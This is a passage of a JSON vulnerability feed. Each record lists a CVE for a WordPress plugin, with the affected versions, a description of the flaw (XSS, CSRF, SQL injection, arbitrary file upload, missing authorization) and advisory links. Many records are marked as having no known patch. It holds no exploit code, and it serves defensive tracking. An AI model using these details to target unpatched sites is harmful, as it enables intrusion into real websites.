replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3faf976d-0763-4e47-9bc3-18c791ec4487?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3faf976d-0763-4e47-9bc3-18c791ec4487?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ultimateai-ai-enhanced-wordpress-plugin-with-saas-for-content-code-chat-and-image-generation\\\/51201953\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ultimateai-ai-enhanced-wordpress-plugin-with-saas-for-content-code-chat-and-image-generation\\\/51201953\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12060","slug":"wp-media-optimizer-webp","versionImpact":"1.4.0","description":"The WP Media Optimizer (.webp) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018wpmowebp-css-resources\u2019 and 'wpmowebp-js-resources' parameters in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-media-optimizer-webp\\\/trunk\\\/wp-media-optimizer-webp.php#L229\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-media-optimizer-webp\\\/trunk\\\/wp-media-optimizer-webp.php#L229\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-media-optimizer-webp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-media-optimizer-webp\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/183d1be9-4c05-4107-b039-3711034ef774?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/183d1be9-4c05-4107-b039-3711034ef774?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13570","slug":"stray-quotes","versionImpact":"1.9.9","description":"The Stray Random Quotes WordPress plugin through 1.9.9 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26019036-f7e4-4ef5-85d4-7d5fda18823e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26019036-f7e4-4ef5-85d4-7d5fda18823e\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26019036-f7e4-4ef5-85d4-7d5fda18823e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26019036-f7e4-4ef5-85d4-7d5fda18823e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13580","slug":"xv-random-quotes","versionImpact":"1.40","description":"The XV Random Quotes WordPress plugin through 1.40 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin reset them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/48cffe03-adcf-4da2-a331-464ae511a805\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/48cffe03-adcf-4da2-a331-464ae511a805\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/48cffe03-adcf-4da2-a331-464ae511a805\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/48cffe03-adcf-4da2-a331-464ae511a805\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-30559","slug":"kento-wp-stats","versionImpact":"1.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NotFound Kento WordPress Stats allows Stored XSS. This issue affects Kento WordPress Stats: from n\/a through 1.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/kento-wp-stats\\\/vulnerability\\\/wordpress-kento-wordpress-stats-plugin-1-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/kento-wp-stats\\\/vulnerability\\\/wordpress-kento-wordpress-stats-plugin-1-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4179","slug":"flynax-bridge","versionImpact":"2.2.0","description":"The Flynax Bridge plugin for WordPress is vulnerable to limited Privilege Escalation due to a missing capability check on the registerUser() function in all versions up to, and including, 2.2.0. This makes it possible for unauthenticated attackers to register new user accounts as authors.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flynax-bridge\\\/trunk\\\/src\\\/API.php#L288\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flynax-bridge\\\/trunk\\\/src\\\/API.php#L288\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2447cf4-0261-4ef2-98ec-98fa02dc8b87?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2447cf4-0261-4ef2-98ec-98fa02dc8b87?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11502","slug":"planning-center-online-giving","versionImpact":"1.0.0","description":"The Planning Center Online Giving WordPress plugin through 1.0.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d9bea52e-af32-449f-97b6-1dcfb2051bda\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d9bea52e-af32-449f-97b6-1dcfb2051bda\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4954","slug":"axle-demo-importer","versionImpact":"1.0.3","description":"The Axle Demo Importer WordPress plugin through 1.0.3 does not validate files to be uploaded, which could allow authenticated users (author and above) to upload arbitrary files such as PHP on the server","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/673f35ff-e1d5-4099-86e7-8b6e3e410ef8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/673f35ff-e1d5-4099-86e7-8b6e3e410ef8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7649","slug":"surbma-recent-comments-shortcode","versionImpact":"2.0","description":"The Surbma | Recent Comments Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'recent-comments' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/surbma-recent-comments-shortcode\\\/tags\\\/2.0\\\/surbma-recent-comments-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/surbma-recent-comments-shortcode\\\/tags\\\/2.0\\\/surbma-recent-comments-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58e9c535-1b36-4795-b8f6-b38f3fc3d164?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58e9c535-1b36-4795-b8f6-b38f3fc3d164?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0043","slug":"custom-add-user","versionImpact":"2.0.2","description":"The Custom Add User WordPress plugin through 2.0.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e012f23a-7daf-4ef3-b116-d0e2ed5bd0a3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e012f23a-7daf-4ef3-b116-d0e2ed5bd0a3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1020","slug":"wp-shoutbox-live-chat","versionImpact":"1.4.2","description":"The Steveas WP Live Chat Shoutbox WordPress plugin through 1.4.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4e5aa9a3-65a0-47d6-bc26-a2fb6cb073ff\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4e5aa9a3-65a0-47d6-bc26-a2fb6cb073ff\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4343","slug":"ulisting","versionImpact":"1.6.6","description":"The Unauthenticated Account Creation plugin for WordPress is vulnerable to Unauthenticated Account Creation in versions up to, and including, 1.6.6. This is due to the stm_listing_register AJAX action function being accessible and taking roles unprotected. This makes it possible for unauthenticated attackers to create accounts, even those with administrator privileges.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c6bf45b-b02d-43bb-b682-7f1ae994e1d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c6bf45b-b02d-43bb-b682-7f1ae994e1d3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4000","slug":"waiting","versionImpact":"0.6.2","description":"The Waiting: One-click countdowns plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 0.6.2. This is due to missing or incorrect nonce validation on its AJAX actions. This makes it possible for unauthenticated attackers to create and delete countdowns, via forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ffba592-6d0d-408f-89fa-079066750b0a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ffba592-6d0d-408f-89fa-079066750b0a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waiting\\\/trunk\\\/waiting.php?rev=2826039\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waiting\\\/trunk\\\/waiting.php?rev=2826039\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3755","slug":"mf-gig-calendar","versionImpact":"1.2.1","description":"The MF Gig Calendar WordPress plugin through 1.2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as editor to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d34caeaf-2ecf-44a2-b308-e940bafd402c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d34caeaf-2ecf-44a2-b308-e940bafd402c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1798","slug":"tutor-lms-migration-tool","versionImpact":"2.2.0","description":"The Tutor LMS \u2013 Migration Tool plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the tutor_lp_export_xml function in all versions up to, and including, 2.2.0. This makes it possible for unauthenticated attackers to export courses, including private and password protected courses.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cb67f55-6d21-4a4e-9651-fcf671788d16?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cb67f55-6d21-4a4e-9651-fcf671788d16?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor-lms-migration-tool\\\/trunk\\\/classes\\\/LPtoTutorMigration.php#L762\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor-lms-migration-tool\\\/trunk\\\/classes\\\/LPtoTutorMigration.php#L762\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11447","slug":"peepso-core","versionImpact":"6.4.6.2","description":"The Community by PeepSo \u2013 Download from PeepSo.com plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018filter\u2019 parameter in all versions up to, and including, 6.4.6.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/tags\\\/6.4.6.2\\\/templates\\\/activity\\\/activity-stream-filters.php#L179\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/tags\\\/6.4.6.2\\\/templates\\\/activity\\\/activity-stream-filters.php#L179\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/tags\\\/6.4.6.2\\\/templates\\\/activity\\\/activity-stream-filters-simple.php#L131\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/tags\\\/6.4.6.2\\\/templates\\\/activity\\\/activity-stream-filters-simple.php#L131\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/trunk\\\/classes\\\/template.php#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peepso-core\\\/trunk\\\/classes\\\/template.php#L68\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/049a36b1-4e24-4ac9-a594-9cabdc0dfe0f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/049a36b1-4e24-4ac9-a594-9cabdc0dfe0f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12028","slug":"friends","versionImpact":"3.2.1","description":"The Friends plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in all versions up to, and including, 3.2.1. This makes it possible for unauthenticated attackers to send arbitrary friend requests on behalf of another website, accept the friend request for the targeted website, and then communicate with the site as an accepted friend.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/friends\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/friends\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/980b16d4-3c4a-4ed1-af46-f39f3ec6dd19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/980b16d4-3c4a-4ed1-af46-f39f3ec6dd19?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12440","slug":"candifly","versionImpact":"1.0.6","description":"The Candifly plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'candifly' shortcode in all versions up to, and including, 1.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/candifly\\\/trunk\\\/candifly.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/candifly\\\/trunk\\\/candifly.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/candifly\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/candifly\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf173ccd-23bc-49ec-92e0-032feae0fa4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf173ccd-23bc-49ec-92e0-032feae0fa4a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13544","slug":"zarinpal-paid-downloads","versionImpact":"2.3","description":"The Zarinpal Paid Download WordPress plugin through 2.3 does not properly validate uploaded files, allowing high privilege users such as admin to upload arbitrary files on the server even when they should not be allowed to (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91884263-62a7-436e-b19f-682b1aeb37d6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/91884263-62a7-436e-b19f-682b1aeb37d6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-27265","slug":"google-maps-for-wordpress","versionImpact":"1.0.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Aaron D. Campbell Google Maps for WordPress allows DOM-Based XSS. This issue affects Google Maps for WordPress: from n\/a through 1.0.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/google-maps-for-wordpress\\\/vulnerability\\\/wordpress-google-maps-for-wordpress-plugin-1-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/google-maps-for-wordpress\\\/vulnerability\\\/wordpress-google-maps-for-wordpress-plugin-1-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13574","slug":"xv-random-quotes","versionImpact":"1.40","description":"The XV Random Quotes WordPress plugin through 1.40 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7eb9ef20-5d34-425e-b7fc-38a769d0a822\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7eb9ef20-5d34-425e-b7fc-38a769d0a822\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7eb9ef20-5d34-425e-b7fc-38a769d0a822\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7eb9ef20-5d34-425e-b7fc-38a769d0a822\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4177","slug":"flynax-bridge","versionImpact":"2.2.0","description":"The Flynax Bridge plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the deleteUser() function in all versions up to, and including, 2.2.0. This makes it possible for unauthenticated attackers to delete arbitrary users.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flynax-bridge\\\/trunk\\\/src\\\/API.php#L386\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flynax-bridge\\\/trunk\\\/src\\\/API.php#L386\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcb33d02-d384-4dff-91e1-c49e86b97d6e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcb33d02-d384-4dff-91e1-c49e86b97d6e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11373","slug":"logs-de-connexion","versionImpact":"3.0.2","description":"The Connexion Logs WordPress plugin through 3.0.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9ef847f-3a3f-4030-828b-78db0044e142\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9ef847f-3a3f-4030-828b-78db0044e142\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4840","slug":"inprosysmedia-likes-dislikes-post","versionImpact":"1.0.0","description":"The inprosysmedia-likes-dislikes-post WordPress plugin through 1.0.0 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85dc579d-edc4-421e-9bb1-09629dec527b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85dc579d-edc4-421e-9bb1-09629dec527b\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85dc579d-edc4-421e-9bb1-09629dec527b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85dc579d-edc4-421e-9bb1-09629dec527b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7441","slug":"story-chief","versionImpact":"1.0.42","description":"The StoryChief plugin for WordPress is vulnerable to arbitrary file uploads in all versions up to, and including, 1.0.42. This vulnerability occurs through the \/wp-json\/storychief\/webhook REST-API endpoint that does not have sufficient filetype validation. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/story-chief\\\/trunk\\\/includes\\\/tools.php#L75\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/story-chief\\\/trunk\\\/includes\\\/tools.php#L75\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/979efaa4-10f1-4c7f-b4b0-5a41678c9d66?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/979efaa4-10f1-4c7f-b4b0-5a41678c9d66?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4829","slug":"show-hidecollapse-expand","versionImpact":"1.2.5","description":"The Show-Hide \/ Collapse-Expand WordPress plugin through 1.2.5 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/57e528ce-ec8c-4734-8903-926be36f91e7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/57e528ce-ec8c-4734-8903-926be36f91e7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0899","slug":"wp-shoutbox-live-chat","versionImpact":"1.4.2","description":"The Steveas WP Live Chat Shoutbox WordPress plugin through 1.4.2 does not sanitise and escape a parameter before outputting it back in the Shoutbox, leading to Stored Cross-Site Scripting which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e95f925f-118e-4fa1-8e8f-9dc1bc698f12\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e95f925f-118e-4fa1-8e8f-9dc1bc698f12\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3999","slug":"waiting","versionImpact":"0.6.2","description":"The Waiting: One-click countdowns plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on its AJAX calls in versions up to, and including, 0.6.2. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to create and delete countdowns as well as manipulate other plugin settings.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waiting\\\/trunk\\\/waiting.php?rev=2826039\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waiting\\\/trunk\\\/waiting.php?rev=2826039\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/293070c8-783f-404d-9250-392713703ce4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/293070c8-783f-404d-9250-392713703ce4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36706","slug":"simplepress","versionImpact":"6.6.0","description":"The Simple:Press \u2013 WordPress Forum Plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ~\/admin\/resources\/jscript\/ajaxupload\/sf-uploader.php file in versions up to, and including, 6.6.0. This makes it possible for attackers to upload arbitrary files on the affected sites server which may make remote code execution 